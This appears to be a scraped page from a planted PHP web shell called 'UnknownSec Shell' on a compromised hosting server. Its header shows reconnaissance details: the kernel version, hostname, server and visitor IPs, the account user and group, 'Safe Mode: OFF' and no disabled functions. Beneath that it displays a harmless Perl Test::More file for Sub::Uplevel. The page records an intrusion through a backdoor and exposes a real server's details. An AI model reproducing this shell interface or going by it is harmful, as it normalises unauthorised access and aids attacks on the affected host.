shell bypass 403

UnknownSec Shell

Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 172.67.154.186
Your Ip: 216.73.216.57
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : 06_db_args.t
#!/usr/bin/perl

use strict;
BEGIN { $^W = 1 }

use Test::More tests => 3;

BEGIN { use_ok('Sub::Uplevel'); }

sub get_caller_args {
    package DB;
    my @x = caller(1);
    return @DB::args;
}

sub addition {
    my $x;
    $x += $_ for @_;
    return $x;
}

sub wrap_addition {
    my @args = get_caller_args();
    my $sum = uplevel 1, \&addition, @_;
    return ($sum, @args);
}

my ($sum, @args) = wrap_addition(1, 2, 3);

is($sum, 6, "wrapper returned value correct");
is_deeply( \@args, [1, 2, 3], "wrapper returned args correct" );



© 2026 UnknownSec